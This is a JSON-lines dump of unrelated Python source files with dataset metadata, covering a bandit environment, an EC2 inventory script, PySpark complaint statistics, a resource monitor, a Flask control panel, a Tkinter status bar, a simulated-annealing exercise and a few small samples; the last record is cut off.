\r\n \r\n gnarl = Gnarl()\r\n gnarl.population = networks\r\n gnarl.fitness = fitness\r\n gnarl.fitness_max = 1\r\n gnarl.remove_node_probability = 0.75\r\n gnarl.remove_node_mu = 2\r\n gnarl.add_node_probability = 0.75\r\n gnarl.add_node_mu = 3\r\n gnarl.remove_edge_probability = 0.75\r\n gnarl.remove_edge_mu = 4\r\n gnarl.add_edge_probability = 0.75\r\n gnarl.add_edge_mu = 5\r\n gnarl.iterations = 1000\r\n\r\n processor = Processor()\r\n for l in gnarl.run():\r\n processor.process_data(l)\r\n\r\nsys.exit(main())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"54273271","text":"# Copyright 2020 Google LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport gym\nimport numpy as np\nimport tensorflow.compat.v2 as tf\n\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport dice_rl.utils.common as common_utils\n\n\nclass Bandit(gym.Env):\n def __init__(self, num_arms=2,\n reward_power=3.0,\n reward_scale=0.9,\n generation_seed=0,\n loop=False):\n self._num_arms = num_arms\n self._reward_power = reward_power\n self._reward_scale = reward_scale\n self._loop = loop\n self._generate_bandit(generation_seed)\n\n self.observation_space = spaces.Discrete(1)\n self.action_space = spaces.Discrete(self._num_arms)\n\n self.seed()\n self.reset()\n\n def _generate_bandit(self, seed):\n gen_random, _ = seeding.np_random(seed)\n\n self._rewards = gen_random.random_sample([self._num_arms])\n self._rewards = self._reward_scale * self._rewards ** self._reward_power\n\n @property\n def rewards(self):\n return self._rewards\n\n @property\n def num_arms(self):\n return self._num_arms\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n return self._get_obs()\n\n def _get_obs(self):\n return 0\n\n def step(self, action):\n reward = self._rewards[action]\n sampled_reward = float(self.np_random.random_sample() <= reward)\n done = not self._loop\n return self._get_obs(), sampled_reward, done, {}\n\n\ndef get_bandit_policy(bandit_env, epsilon_explore=0.0, py=True,\n return_distribution=True):\n \"\"\"Creates an optimal policy for solving the bandit environment.\n\n Args:\n bandit_env: A bandit environment.\n epsilon_explore: Probability of sampling random action as opposed to optimal\n action.\n py: Whether to return Python policy (NumPy) or TF (Tensorflow).\n return_distribution: In the case of a TF policy, whether to return the\n full action distribution.\n\n Returns:\n A policy_fn that takes in an observation and returns a sampled action along\n with a dictionary containing policy information (e.g., log probability).\n A spec that determines the type of objects returned by policy_info.\n\n Raises:\n ValueError: If epsilon_explore is not a valid probability.\n \"\"\"\n if epsilon_explore < 0 or epsilon_explore > 1:\n raise ValueError('Invalid exploration value %f' % epsilon_explore)\n\n optimal_action = np.argmax(bandit_env.rewards)\n policy_distribution = np.ones([1, bandit_env.num_arms]) / bandit_env.num_arms\n policy_distribution[0] *= epsilon_explore\n policy_distribution[0, optimal_action] += 1 - epsilon_explore\n\n def obs_to_index_fn(observation):\n if py:\n return np.array(observation, dtype=np.int32)\n else:\n return tf.cast(observation, tf.int32)\n\n if py:\n return common_utils.create_py_policy_from_table(\n policy_distribution, obs_to_index_fn)\n else:\n return common_utils.create_tf_policy_from_table(\n policy_distribution, obs_to_index_fn,\n return_distribution=return_distribution)\n","sub_path":"environments/bandit.py","file_name":"bandit.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"537956912","text":"import time\n\ndef function_runtime_decorator(func):\n def wrapper(*args,**kwargs):\n start = time.time()\n result = func(*args,**kwargs)\n end = time.time()\n print(func.__name__ + \" took \"+ str((end-start)*1000) + \" milliseconds\");\n return wrapper\n\n\n@function_runtime_decorator\ndef calculate_square(data):\n result = []\n for number in data:\n answer = number*number\n result.append(answer)\n return result\n\n@function_runtime_decorator\ndef calculate_cube(data):\n result = []\n for number in data:\n answer = number*number*number\n result.append(answer)\n return result\n\n\ndata = range(1,10000)\ncalculate_square(data)\ncalculate_cube(data)\n","sub_path":"ProgrammingLanguage/Python/DecoratorSample/Decorator.py","file_name":"Decorator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"607729319","text":"#!/bin/python\nimport sys\nimport json\n\ntry:\n import boto3\nexcept ImportError:\n print(\"Please install boto3 using pip install boto3 and try again\")\n sys.exit(1)\nexcept Exception as e:\n print(e)\n sys.exit(2)\n\ndef get_hosts(all_ec2s,f_value):\n custom_filter={\"Name\":\"tag:Environment\", \"Values\":[f_value]}\n hosts=[]\n for instance in all_ec2s.instances.filter(Filters=[custom_filter]):\n hosts.append(instance.private_ip_address)\n return hosts\n\n# main function which will poll all ec2 resources from us-east-1\ndef main():\n all_ec2s=boto3.resource(\"ec2\",\"us-east-1\")\n db_group=get_hosts(all_ec2s,\"db\")\n web_group=get_hosts(all_ec2s,\"web\")\n all_groups= { 'db': db_group,\n 'web': web_group\n }\n print(json.dumps(all_groups))\n\nif __name__==\"__main__\":\n main()","sub_path":"custom_dynamic_inventory.py","file_name":"custom_dynamic_inventory.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"170565479","text":"from pyspark.sql import SQLContext\nfrom pyspark.sql.functions import isnan, when, count, col, length, desc, unix_timestamp, from_unixtime\n\nsqlContext = SQLContext(sc)\n\n# read csv into dataframes\ndf = sqlContext.read.load('20*.csv', format='com.databricks.spark.csv', header='true', inferSchema='true')\n\n# Group By Year\ndf.withColumn('year', col('Created Date').substr(7,4)).groupBy('year').count().show()\n\n# Group By Month\ndf.withColumn('month', col('Created Date').substr(0,2)).groupBy('month').count().show()\n\n# Group By Zip\ndf.groupBy('Incident Zip').count().sort('count',ascending=False).show()\n\n# Group By Closed Year\ndf.withColumn('year_close', col('Closed Date').substr(7,4)).groupBy('year_close').count().show()\n\n# Add Date column\ndf = df.withColumn('date', col('Created Date').substr(0,10))\ndf = df.withColumn('date_close', col('Closed Date').substr(0,10))\n\n# Get Daily Average Create\nfor x in range(2009,2018):\n df.filter(col('year')==str(x)).groupBy('date').count().describe().show()\n\n# Get Daily Average Close\nfor x in range(2009,2018):\n df.filter(col('year_close')==str(x)).groupBy('date_close').count().filter(length(col('date_close'))==10).agg(avg(col('count'))).show()\n\n# Get Most Complaint Type\nfor x in range(2009,2018):\n df.filter(col('year')==str(x)).groupBy('Complaint Type').count().sort('count', ascending=False).take(1)\n\n# Get Most Complaint Zip Area\nfor x in range(2009,2018):\n df.filter(col('year')==str(x)).groupBy('Incident Zip').count().sort('count', ascending=False).take(2)\n\n# Get Borough\nfor x in range(2009,2018):\n df.filter(col('year')==str(x)).groupBy('Borough').count().sort('count', ascending=False).take(2)\n\nfor x in range(2009,2018):\n df.filter(col('year')==str(x)).groupBy('Agency').count().sort('count', ascending=False).take(2)\n\nfor x in range(2009,2018):\n df.filter(col('year')==str(x)).groupBy('Location Type').count().sort('count', ascending=False).take(2)\n","sub_path":"summary/summary-part1.py","file_name":"summary-part1.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"599523344","text":"import json\nimport os\n\nimport time\nfrom twisted.internet.task import LoopingCall\n\nfrom requestmgr import HTTPRequestManager\n\n\nclass ResourceMonitor(object):\n \"\"\"\n This class is responsible for monitoring resources in Tribler.\n Specifically, it fetches information from the Tribler core and writes it to a file.\n \"\"\"\n\n def __init__(self, interval):\n self.interval = interval\n self.request_manager = HTTPRequestManager()\n self.monitor_memory_lc = LoopingCall(self.monitor_memory)\n self.monitor_cpu_lc = LoopingCall(self.monitor_cpu)\n self.start_time = time.time()\n self.latest_memory_time = 0\n self.latest_cpu_time = 0\n\n # Create the output directory if it does not exist yet\n output_dir = os.path.join(os.getcwd(), \"output\")\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n self.memory_stats_file_path = os.path.join(output_dir, 'memory_stats.csv')\n with open(self.memory_stats_file_path, \"w\") as output_file:\n output_file.write(\"time,memory_usage\\n\")\n\n self.cpu_stats_file_path = os.path.join(output_dir, 'cpu_stats.csv')\n with open(self.cpu_stats_file_path, \"w\") as output_file:\n output_file.write(\"time,cpu_usage\\n\")\n\n def start(self):\n \"\"\"\n Start the monitoring loop for the resources.\n \"\"\"\n self.monitor_memory_lc.start(self.interval)\n self.monitor_cpu_lc.start(self.interval)\n\n def stop(self):\n \"\"\"\n Stop the monitoring loop for the resources.\n \"\"\"\n if self.monitor_memory_lc and self.monitor_memory_lc.running:\n self.monitor_memory_lc.stop()\n self.monitor_memory_lc = None\n\n if self.monitor_cpu_lc and self.monitor_cpu_lc.running:\n self.monitor_cpu_lc.stop()\n self.monitor_cpu_lc = None\n\n def on_memory_history(self, response):\n history = json.loads(response)\n for history_item in history[\"memory_history\"]:\n if history_item[\"time\"] > self.latest_memory_time:\n self.latest_memory_time = history_item[\"time\"]\n time_diff = history_item[\"time\"] - self.start_time\n with open(self.memory_stats_file_path, \"a\") as output_file:\n output_file.write(\"%s,%s\\n\" % (time_diff, history_item[\"mem\"]))\n\n def on_cpu_history(self, response):\n history = json.loads(response)\n for history_item in history[\"cpu_history\"]:\n if history_item[\"time\"] > self.latest_cpu_time:\n self.latest_cpu_time = history_item[\"time\"]\n time_diff = history_item[\"time\"] - self.start_time\n with open(self.cpu_stats_file_path, \"a\") as output_file:\n output_file.write(\"%s,%s\\n\" % (time_diff, history_item[\"cpu\"]))\n\n def monitor_memory(self):\n \"\"\"\n Monitor the memory usage in Tribler.\n \"\"\"\n return self.request_manager.get_memory_history_core().addCallback(self.on_memory_history)\n\n def monitor_cpu(self):\n \"\"\"\n Monitor the CPU usage in Tribler.\n \"\"\"\n return self.request_manager.get_cpu_history_core().addCallback(self.on_cpu_history)\n","sub_path":"resource_monitor.py","file_name":"resource_monitor.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2561054","text":"import socket\nimport requests\n# import json\nimport psutil\n\nfrom .html_templates import * # pylint: disable=unused-wildcard-import\n\n\n\nSTYLES = '''\n\n'''\n\n\nclass ControlPanel:\n\t'''Automatically scan ports and consolidate many TaskMonitors'''\n\n\tdef __init__(self,\n\t\tapp,\n\t\tports=[],\n\t\texternal_addrs=[],\n\t\tpage_refresh=60):\n\n\t\tself.app = app\n\t\tself.machine = socket.gethostname()\n\t\tself.local_ip = socket.gethostbyname(self.machine)\n\t\tself.ports = set(ports)\n\t\tself.external_addrs = set(external_addrs)\n\t\tself.page_refresh = page_refresh\n\t\tself.app.add_url_rule(\"/\", view_func=self._render_monitors, methods=['GET'])\n\n\n\tdef scan(self, min_port=1000, max_port=10000, timeout=5):\n\t\tfor conn in psutil.net_connections():\n\t\t\tif conn.status == \"LISTEN\" and conn.laddr.port >= min_port and conn.laddr.port <= max_port:\n\t\t\t\tm = self._get_taskmonitor(self.local_ip, conn.laddr.port, timeout=timeout)\n\t\t\t\tif m is not None:\n\t\t\t\t\tself.ports.add(conn.laddr.port)\n\t\t\t\tprint('>> scanned', conn.laddr.port, \"- found\" if m is not None else \"\")\n\n\n\tdef _get_taskmonitor(self, host, port, timeout=5):\n\t\ttry:\n\t\t\tmonitor_url = f\"http://{host}:{port}/@taskmonitor\" # need to add option to change this endpoint since task monitor has that option\n\t\t\tres = requests.get(f\"{monitor_url}/json/summary\", timeout=timeout).json()\n\t\t\t# print(json.dumps(res, indent=4))\n\t\t\tres['port'] = port\n\t\t\tres['url'] = monitor_url\n\t\t\treturn res\n\t\texcept Exception:\n\t\t\t# print(e)\n\t\t\treturn None\n\n\n\tdef _iter_monitors(self):\n\t\tfor port in self.ports:\n\t\t\tmonitor = self._get_taskmonitor(self.local_ip, port)\n\t\t\tif monitor is not None:\n\t\t\t\tyield monitor\n\t\tfor host, port in self.external_addrs:\n\t\t\tmonitor = self._get_taskmonitor(host, port)\n\t\t\tif monitor is not None:\n\t\t\t\tyield monitor\n\n\n\tdef _render_monitors(self):\n\t\tcontent = []\n\t\tfor monitor in self._iter_monitors():\n\t\t\tcss = ['monitor-block']\n\t\t\tattrs = {}\n\t\t\telem = \"\"\n\t\t\tif 'error' in monitor:\n\t\t\t\telem = H(5, monitor['error']) + SPAN(str(monitor['url']))\n\t\t\t\tcss.append('error-border')\n\t\t\t\tcss.append('no-page')\n\t\t\t\tattrs['title'] = monitor['error']\n\t\t\telse:\n\t\t\t\tmon = monitor['success']\n\t\t\t\terr_msg_css = []\n\t\t\t\tif mon['summary']['errors'] > 0:\n\t\t\t\t\tcss.append('error-border')\n\t\t\t\t\terr_msg_css.append('error-msg')\n\t\t\t\tmsg = f\"tasks: {DIV(mon['summary']['count'])} errors: {DIV(mon['summary']['errors'], css=err_msg_css)}\"\n\t\t\t\telem = SPAN(B(mon['name']), css=['block-title']) + SPAN(msg, css=['block-msg'])\n\t\t\t\tattrs['data-url'] = monitor['url']\n\t\t\t\tattrs['title'] = f\"{mon['name']}\\n{monitor['url']}\"\n\t\t\tcontent.append(DIV(elem, css=css, attrs=attrs))\n\t\twrapper = DIV(''.join(content), css='wrapper')\n\t\theader_txt = f\"Control Panel\"\n\t\theader = DIV(H(2, header_txt), css=['header-bar'])\n\t\trerun_txt = SMALL(f\"Auto-refresh in {SPAN(self.page_refresh, attrs={'id': 'refresh-msg'})} seconds\")\n\n\t\tauto_reload = SCRIPT('''\n\t\tlet COUNT_DOWN = {page_refresh}\n\t\twindow.addEventListener('load', (event) => {{\n\t\t\tconst timer = setInterval(()=>{{\n\t\t\t\tif (COUNT_DOWN > 0) {{\n\t\t\t\t\tCOUNT_DOWN --\n\t\t\t\t\tdocument.getElementById('refresh-msg').innerText = COUNT_DOWN\n\t\t\t\t}} else {{\n\t\t\t\t\tclearInterval(timer)\n\t\t\t\t\tlocation.reload()\n\t\t\t\t}}\n\t\t\t}}, 1000)\n\t\t\tdocument.querySelectorAll('.monitor-block:not(.no-page)').forEach(block=>{{\n\t\t\t\tblock.addEventListener('click', ()=>{{\n\t\t\t\t\twindow.location.href=block.getAttribute(\"data-url\")\n\t\t\t\t}})\n\t\t\t}})\n\t\t}});\n\t\t'''.format(page_refresh=self.page_refresh))\n\t\treturn HTML(''.join([\n\t\t\tSTYLES,\n\t\t\theader,\n\t\t\trerun_txt,\n\t\t\twrapper,\n\t\t\tauto_reload\n\t\t]), title=header_txt)\n","sub_path":"flask_production/plugins/ctrl_panel.py","file_name":"ctrl_panel.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"530727823","text":"import discord\nimport asyncio\n\nclient = discord.Client()\nbotkey = \"\"\n\n@client.event\nasync def on_ready():\n\tprint (\"Logged in as:\")\n\tprint (client.user.name)\n\n@client.event\nasync def on_message(message):\n\tif \"blox\" in message.content.lower():\n\t\tmessage = await client.send_message(message.channel, \"OOF\")\n\n\telif \"oofbot\" in message.content.lower():\n\t\tmessage = await client.send_message(message.channel, \"You called?\")\n\n\telif \"robux\" in message.content.lower():\n\t\tmessage = await client.send_message(message.channel, \"$$$ https://www.roblox.com/upgrades/robux $$$\")\n\nclient.run(botkey)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"518643169","text":"from numpy import cos, pi, exp, sqrt\r\nimport numpy as np\r\nfrom numpy.random import normal, seed\r\nfrom random import random\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import rc\r\n\r\nfont = {'family': 'DejaVu Sans', 'size': 14} # adjust fonts\r\nrc('font', **font)\r\n\r\nseed(2)\r\n\r\ndef f(x, y):\r\n \"\"\"\r\n Given function 1b(i) to find the minimum.\r\n \"\"\"\r\n return x**2 - cos(4*x*pi) + (y-1)**2\r\n\r\n\r\ndef g(x,y):\r\n \"\"\"\r\n Given function 1b(ii) to find the minimum.\r\n \"\"\"\r\n return cos(x) + cos(sqrt(2) * x) + cos(sqrt(3) * x) + (y-1)**2 \r\n\r\n\r\ndef run_b(func, q_name):\r\n # set the variables\r\n Tmax = 1.0\r\n Tmin = 1e-5\r\n tau = 1e4\r\n \r\n # Main loop\r\n t = 0\r\n T = Tmax\r\n # starting point\r\n x,y = 2,2\r\n # std and mean for gaussian distribution\r\n mean, std = 0, 1\r\n \r\n # to store the results\r\n time = []\r\n func_arr = []\r\n x_y_arr = []\r\n \r\n # compute the results intially\r\n time.append(t)\r\n x_y_arr.append([x,y])\r\n func_arr.append(func(x,y))\r\n \r\n while T>Tmin:\r\n \r\n # Cooling\r\n t += 1\r\n T = Tmax*exp(-t/tau)\r\n \r\n # sample from a gaussian dstribution\r\n dx, dy = normal(mean, std, 2) \r\n # Monte Carlo moves\r\n new_x, new_y = x+dx, y+dy\r\n \r\n # find the change in energy\r\n new_func = func(new_x, new_y)\r\n delta_func = new_func - func_arr[-1]\r\n \r\n if q_name == 'bi':\r\n if random() < exp(-delta_func/T):\r\n # make move\r\n x, y = new_x, new_y\r\n # store the energy, time and moves\r\n time.append(t)\r\n x_y_arr.append([x,y])\r\n func_arr.append(func(x,y))\r\n else:\r\n if 0 < new_x < 50 and -20 < new_y < 20 and random() < exp(-delta_func/T):\r\n # make move\r\n x, y = new_x, new_y\r\n # store the energy, time and moves\r\n time.append(t)\r\n x_y_arr.append([x,y])\r\n func_arr.append(func(x,y))\r\n \r\n print(\"The value of (x, y) for Qb({}) is ({:.3f}, {:.3f}).\".format(q_name[1:],x,y))\r\n \r\n x_y_arr = np.array(x_y_arr)\r\n \r\n # plot x as a function of time\r\n plt.figure()\r\n plt.scatter(time, x_y_arr[:, 0])\r\n plt.xlabel(\"Time (t)\")\r\n plt.ylabel(\"x\")\r\n plt.title(\"Qb({}) x as a function of time\".format(q_name[1:]))\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.savefig(q_name + '_x.pdf')\r\n \r\n # plot y as a function of time\r\n plt.figure()\r\n plt.scatter(time, x_y_arr[:, 1], color='#f97306')\r\n plt.xlabel(\"Time (t)\")\r\n plt.ylabel(\"y\")\r\n plt.title(\"Qb({}) y as a function of time\".format(q_name[1:]))\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.savefig(q_name + '_y.pdf')\r\n \r\n \r\n# run b(i)\r\nrun_b(f, 'bi')\r\n\r\n# run b(ii)\r\nrun_b(g, 'bii') \r\n \r\n","sub_path":"Markov Chain and Protien Folding (Lab11)/Q1/lab11_Q1b.py","file_name":"lab11_Q1b.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"499956533","text":"#!/usr/bin/python3\n# statusbar.py - creates a widget that shows the temperature of the RPI and the IP address if it is assigned.\n\nimport os, sys\nimport subprocess\nfrom tkinter import *\nimport datetime\nimport time\nimport logging\n\nclass Statusbar:\n\n def __init__(self, window, relx=0.05, rely=0.55, width=0.1, height=0.1, anchor='nw', show=True):\n self.logger = logging.getLogger('SM2.statusbar')\n\n if __name__ == '__main__': # Creates a logger if the module is called directly.\n ch = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n self.logger.setLevel(logging.DEBUG)\n self.logger.addHandler(ch)\n\n self.logger.info('Initialization of STATUSBAR widget...')\n\n self.REFRESH_RATE = 5000 # time in milliseconds between measurments.\n\n self.window = window\n # Dimesnsions of the main window (screen size)\n self.window_width = window.winfo_screenwidth()\n self.window_height = window.winfo_screenheight()\n\n self.relx = relx\n self.rely = rely\n self.target_width = int(width * self.window_width)\n self.target_height = int(height * self.window_height)\n self.anchor = anchor\n self.show = show\n\n self.font_size = 50\n\n self.statusbar_frame = Frame(self.window, bg='black', bd=0)\n\n if self.anchor == 'ne':\n self.relx += width\n\n self.statusbar_frame.place(\n relx=self.relx,\n rely=self.rely,\n anchor=self.anchor)\n\n # The inner top frame is used to display the CPU temperature.\n self.topframe_inside = Frame(self.statusbar_frame, bg='black', bd=0)\n self.topframe_inside.grid(column=0, row=0, sticky=self.anchor)\n\n # The inner middle frame is used to display the GPU temperature.\n self.middleframe_inside = Frame(self.statusbar_frame, bg='black', bd=0)\n self.middleframe_inside.grid(column=0, row=1, sticky=self.anchor)\n\n # The inner bottom frame is used to display the IP address.\n self.bottomframe_inside = Frame(self.statusbar_frame, bg='black', bd=0)\n self.bottomframe_inside.grid(column=0, row=2, sticky=self.anchor)\n\n self.temp_CPU = subprocess.Popen(\n 'cat /sys/class/thermal/thermal_zone0/temp',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n\n _, temp_CPU_error = self.temp_CPU.communicate() \n if temp_CPU_error.decode(\"utf-8\").find('not found') != -1:\n self.logger.warning('CPU temperature measurment is not supported!')\n self.temp_CPU.stdout.close()\n self.temp_CPU = False\n else:\n self.temp_CPU = 'CPU __._°C'\n\n self.temp_GPU = subprocess.Popen(\n 'vcgencmd measure_temp',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n\n _, temp_GPU_error = self.temp_GPU.communicate() \n if temp_GPU_error.decode(\"utf-8\").find('not found') != -1:\n self.logger.warning('GPU temperature measurement is not supported!')\n self.temp_GPU.stdout.close()\n self.temp_GPU = False\n else:\n self.temp_GPU = 'GPU __._°C'\n \n self.IP_address = subprocess.Popen(\n 'hostname -I',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n\n _, IP_address_error = self.IP_address.communicate() \n if IP_address_error.decode(\"utf-8\").find('not found') != -1:\n self.logger.warning('Cannot get the IP address!')\n self.IP_address.stdout.close()\n self.IP_address = False\n else:\n self.IP_address = 'IP: ___.___.___.___'\n\n if self.temp_CPU:\n self.cpu_temp_label = Label(\n self.middleframe_inside,\n text='CPU 21 °C',\n fg='lightblue',\n bg='black',\n font=(\"SFUIText\", self.font_size, \"bold\")\n )\n if self.anchor == 'nw':\n self.cpu_temp_label.pack(side=LEFT)\n else:\n self.cpu_temp_label.pack(side=RIGHT)\n\n if self.temp_GPU:\n self.gpu_temp_label = Label(\n self.topframe_inside,\n text='GPU 22 °C',\n fg='lightblue',\n bg='black',\n font=(\"SFUIText\", self.font_size, \"bold\")\n )\n if self.anchor == 'nw':\n self.gpu_temp_label.pack(side=LEFT)\n else:\n self.gpu_temp_label.pack(side=RIGHT)\n\n if self.IP_address:\n self.ip_address_label = Label(\n self.bottomframe_inside,\n text='000.000.000.000',\n fg='lightblue',\n bg='black',\n font=(\"SFUIText\", self.font_size, \"bold\")\n )\n if self.anchor == 'nw':\n self.ip_address_label.pack(side=LEFT)\n else:\n self.ip_address_label.pack(side=RIGHT)\n\n self.window.update_idletasks()\n self.get_font_size()\n\n self.logger.info('STATUSBAR widget has been created.')\n self.status()\n\n def get_font_size(self):\n \"\"\" The method decreases the font size until it satisfies the target\n width and height of the widget.\"\"\"\n while self.font_size > 12:\n if self.temp_CPU:\n self.cpu_temp_label.config(font=(\"SFUIText\", self.font_size, \"bold\"))\n if self.temp_GPU:\n self.gpu_temp_label.config(font=(\"SFUIText\", self.font_size, \"bold\"))\n if self.IP_address:\n self.ip_address_label.config(font=(\"SFUIText\", self.font_size, \"bold\"))\n\n self.window.update_idletasks()\n\n self.statusbar_frame_width = self.statusbar_frame.winfo_width()\n self.statusbar_frame_height = self.statusbar_frame.winfo_height()\n if self.statusbar_frame_width > self.target_width or self.statusbar_frame_height > self.target_height:\n self.font_size -= 1\n else:\n #self.logger.debug(f'Target widget width {self.target_width}')\n #self.logger.debug(f'Real widget width {int(self.statusbar_frame_width)}')\n #self.logger.debug(f'Target widget height {self.target_height}')\n #self.logger.debug(f'Real widget height {int(self.statusbar_frame_height)}')\n break\n\n def status(self):\n if self.show:\n self.statusbar_frame.place(\n relx=self.relx,\n rely=self.rely,\n anchor=self.anchor\n )\n self.widget()\n else:\n self.statusbar_frame.place_forget()\n self.statusbar_frame.after(1000, self.status)\n\n def widget(self):\n if self.temp_CPU:\n self.cpu_temp_label.config(text=self.temp_CPU)\n if self.temp_GPU:\n self.gpu_temp_label.config(text=self.temp_GPU)\n if self.IP_address:\n self.ip_address_label.config(text=self.IP_address)\n self.measure_temp_cpu()\n\n def measure_temp_cpu(self):\n if self.temp_CPU:\n try:\n self.temp_CPU = subprocess.Popen(\n 'cat /sys/class/thermal/thermal_zone0/temp',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n\n self.temp_CPU, _ = self.temp_CPU.communicate() \n self.temp_CPU = round(int(self.temp_CPU.decode('utf-8')) / 1000, 1)\n self.temp_CPU = f'CPU {str(self.temp_CPU)}°C'\n except Exception as exc:\n self.temp_CPU = ''\n self.logger.error(f'Cannot get the CPU temp: {exc}')\n\n if self.temp_GPU:\n self.statusbar_frame.after(self.REFRESH_RATE, self.measure_temp_gpu)\n else:\n if self.IP_address:\n self.statusbar_frame.after(self.REFRESH_RATE, self.get_ip_address)\n else:\n self.statusbar_frame.after(self.REFRESH_RATE, self.status)\n\n def measure_temp_gpu(self):\n try:\n self.temp_GPU = subprocess.Popen(\n 'vcgencmd measure_temp',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n self.temp_GPU, _ = self.temp_GPU.communicate()\n self.temp_GPU = self.temp_GPU.decode('utf-8')\n self.temp_GPU = self.temp_GPU[self.temp_GPU.find('=') + 1: self.temp_GPU.find(\"'\")]\n self.temp_GPU = float(self.temp_GPU)\n self.temp_GPU = f'GPU {self.temp_GPU}°C'\n except Exception as exc:\n self.logger.error(f'Cannot get the GPU temp: {exc}')\n\n if self.IP_address:\n self.statusbar_frame.after(self.REFRESH_RATE, self.get_ip_address)\n else:\n self.statusbar_frame.after(self.REFRESH_RATE, self.status)\n\n def get_ip_address(self):\n try:\n self.IP_address = subprocess.Popen(\n 'hostname -I',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n\n self.IP_address, _ = self.IP_address.communicate()\n self.IP_address = f'IP: {self.IP_address.decode(\"utf-8\")}'\n except Exception as exc:\n self.logger.error(f'Cannot get the IP address: {exc}')\n self.statusbar_frame.after(self.REFRESH_RATE, self.status)\n\n def widget_update(self, *args):\n try:\n self.logger.debug('Updating statusbar widget...')\n self.relx = args[0]\n self.rely = args[1]\n self.statusbar_frame.place(relx=self.relx, rely=self.rely)\n width = args[2]\n height = args[3]\n self.anchor = args[4]\n if self.anchor == 'ne':\n self.relx += width\n self.target_width = int(width * self.window_width)\n self.target_height = int(height * self.window_height)\n self.font_size = 50\n\n self.statusbar_frame.place(\n relx=self.relx,\n rely=self.rely,\n anchor=self.anchor\n )\n if self.temp_CPU:\n self.cpu_temp_label.config(text='CPU __._°C')\n if self.temp_GPU:\n self.gpu_temp_label.config(text='GPU __._°C')\n if self.IP_address:\n self.ip_address_label.config(text='000.000.000.000')\n\n self.get_font_size()\n self.topframe_inside.grid(\n column=0,\n row=0,\n sticky=self.anchor\n )\n\n self.middleframe_inside.grid(\n column=0,\n row=1,\n sticky=self.anchor\n )\n\n self.bottomframe_inside.grid(\n column=0,\n row=2,\n sticky=self.anchor\n )\n\n if self.anchor == 'nw':\n if self.temp_CPU:\n self.cpu_temp_label.pack(side=LEFT)\n if self.temp_GPU:\n self.gpu_temp_label.pack(side = LEFT)\n if self.IP_address:\n self.ip_address_label.pack(side = LEFT)\n else:\n if self.temp_CPU:\n self.cpu_temp_label.pack(side=RIGHT)\n if self.temp_GPU:\n self.gpu_temp_label.pack(side = RIGHT)\n if self.IP_address:\n self.ip_address_label.pack(side = RIGHT)\n self.logger.debug('Widget has been updated!')\n except Exception as exc:\n self.logger.error(f'Cannot update the widget: {exc}')\n\n def destroy(self):\n self.logger.debug('Closing Statusbar...')\n self.statusbar_frame.destroy()\n\nif __name__ == '__main__':\n try:\n window = Tk()\n window.title('Main Window')\n window.configure(bg='black')\n #window.overrideredirect(True)\n w, h = window.winfo_screenwidth(), window.winfo_screenheight()\n window.geometry(\"%dx%d+0+0\" % (w, h))\n a = Statusbar(window)\n window.mainloop()\n except KeyboardInterrupt:\n sys.exit()\n\n__version__ = '0.97' # 19th November 2020\n__author__ = 'Dmitry Kudryashov'\n__maintainer__ = 'Dmitry Kudryashov'\n__email__ = \"dmitry-kud@yandex.ru\"\n__status__ = \"Development\"","sub_path":"smartmirror2/widgets/statusbar.py","file_name":"statusbar.py","file_ext":"py","file_size_in_byte":12786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"230090087","text":"#!/usr/bin/python3\n\n\"\"\" * When the commit command is triggered, this program will be called\n\t* By default, the second parameter will be a link to the temporary file where the commit's message is stored\n\t\t* We can read through this file to judge whether the message is appropriate or not \n\t\t\n\t* A good commit message should obey the following rules:\n\t\t* Seperate subject from body with a blank line\n\t\t* Limit the subject line to 50 